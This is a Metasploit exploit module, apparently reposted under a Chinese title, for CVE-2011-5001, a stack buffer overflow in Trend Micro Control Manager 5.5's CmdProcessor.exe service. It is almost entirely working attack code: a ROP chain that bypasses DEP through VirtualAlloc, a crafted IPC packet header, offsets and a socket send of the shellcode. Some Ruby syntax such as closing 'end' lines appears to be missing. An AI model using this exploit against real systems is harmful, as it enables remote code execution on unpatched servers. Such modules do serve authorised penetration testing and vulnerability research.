趋势杀毒 Control Manger <= v5.5 CmdProcessor.exe Stack Buffer Overflow

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking
	include Msf::Exploit::Remote::Tcp
	def initialize(info={})
			'Name'           => "TrendMicro Control Manger <= v5.5 CmdProcessor.exe Stack Buffer Overflow",
			'Description'    => %q{
					This module exploits a vulnerability in the CmdProcessor.exe component of Trend
				Micro Control Manger up to version 5.5.
					The specific flaw exists within CmdProcessor.exe service running on TCP port
				20101. The vulnerable function is the CGenericScheduler::AddTask function of
				cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet,
				controlled data is copied into a 256-byte stack buffer. This can be exploited
				to execute remote code under the context of the user.
			'License'        => MSF_LICENSE,
			'Author'         =>
					'Luigi Auriemma',  #Initial discovery
					'Blue',            #Metasploit
			'References'     =>
					['CVE', '2011-5001'],
					['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-345/']
			'Payload'        =>
					'BadChars' => "\x00",
			'DefaultOptions'  =>
					'ExitFunction' => 'process',
			'Platform'       => 'win',
			'Targets'        =>
						# TCM 5.5 cannot be installed in Win2k3 SP0-SP1, Win2k8, or XP
						'Windows 2003 Server SP2 (DEP Bypass)',
							'Ret'    => 0x666b34c8, # TMNotify.dll stack pivot
							'Offset' => 5000
			'Privileged'     => false,
			'DisclosureDate' => "Dec 07 2011",
			'DefaultTarget'  => 0))
			], self.class)
	def junk
		return rand_text(4).unpack("L")[0].to_i
	def exploit
		rop_chain = [
			0x668074d4,	# POP EDX # OR AL,0F6 # RETN
			0x3FCD0FFC,	# Put 00001000 into edx
			0x667611b2,	# ADD EDX,C0330004 # RETN 04
			0x667c99e7,	# POP EBP # RETN [TmUpdate.dll]
			0x667c99e7,	# skip 4 bytes [TmUpdate.dll]
			0x667e3250,	# POP EBX # RETN [TmUpdate.dll]
			0xffffffff,	# NEG EBX
			0x6683ab64,	# INC EBX # XOR EAX,EAX # RETN [TmUpdate.dll]
			0x6683ab64,	# INC EBX # XOR EAX,EAX # RETN [TmUpdate.dll]
			0x6680a1d3,	# POP EAX # RETN [TmUpdate.dll]
			0xffffffc0,	# Value to negate, will become 0x00000040
			0x66812b53,	# NEG EAX # RETN [TmUpdate.dll]
			0x667f030a,	# MOV ECX,EAX # RETN [TmUpdate.dll]
			0x667d4c7c,	# POP EDI # RETN [TmUpdate.dll]
			0x667e8003,	# RETN (ROP NOP) [TmUpdate.dll]
			0x667d54d0,	# POP ESI # RETN [TmUpdate.dll]
			0x667baf06,	# JMP [EAX] [TmUpdate.dll]
			0x66833376,	# POP EAX # RETN [TmUpdate.dll]
			0x6686115c,	# ptr to &VirtualAlloc() [IAT TmUpdate.dll]
			0x6681ceb3,	# PUSHAD # RETN [TmUpdate.dll]
			0x668382c3,	# ptr to 'call esp' [TmUpdate.dll]
		#rop chain generated by mona.py
		header  = "\x00\x00"
		header << "\x13\x88"          #size of buffer
		header << rand_text_alpha(9)
		header << "\x15\x09\x13"      #opcode
		header << "\x00\x00\x00"
		header << rand_text_alpha(25)
		header << "\xFE\xFF\xFF\xFF"  #in instruction #MOV EDI,DWORD PTR DS:[EAX+ECX] #ECX is our buffer and needs to be readable dword
		header << "\xFF\xFF\xFF\xFF"  #after sum with EAX. Pointer from EAX increments by #LEA EAX,DWORD PTR DS:[EAX+EDI+4] and then is saved
		header << "\xFF\xFF\xF4\xFF"  #and used again. We can essentially walk the loop which increments EBX by 1 until we get to 14 which leads
		header << "\xFF\xFF"          #us to our vulnerable function
		header << rand_text_alpha(1)  #align stack again for rop
		pay = rop_chain
		pay << make_nops(374 - rop_chain.length)
		pay << "\xeb\x04"  #Short jmp 0x04
		pay << [target.ret].pack('V')
		pay << payload.encoded
		sploit = header
		sploit << pay
		filler = rand_text_alpha(target['Offset'] - (sploit.length))
		print_status("Sending request...")
		sock.put(sploit + filler)
